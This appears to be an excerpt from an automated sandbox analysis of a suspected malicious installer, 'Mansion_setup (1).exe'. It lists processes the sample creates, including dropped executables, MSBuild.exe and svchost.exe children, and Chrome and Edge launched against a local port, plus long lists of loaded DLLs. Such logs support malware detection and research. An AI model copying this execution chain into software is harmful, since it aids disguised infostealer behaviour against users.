Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exe
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6176 -s 344
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1660 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --mojo-platform-channel-handle=2940 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe "C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\my-electron-app" --app-path="C:\Users\user~1\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1739628551283596 --launch-time-ticks=4519743123 --mojo-platform-channel-handle=3100 --field-trial-handle=1664,i,10003974961743176471,10805792500059126368,262144 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process created: C:\games\DDR5_NetCache\qtZint.exe C:\games\DDR5_NetCache\qtZint.exe	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrE697.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/bd5c97e1"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user~1\AppData\Local\Temp\chrEBD8.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/c75c1857/0da50779"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2096,i,7666385675108331514,3856656827583616406,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=1980,i,2109797830624315799,4341307213657690466,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: msspellcheckingfacility.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mf.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: msmpeg2vdec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mfperfhelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dxva2.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: msvproc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uiautomationcore.dll	Jump to behavior
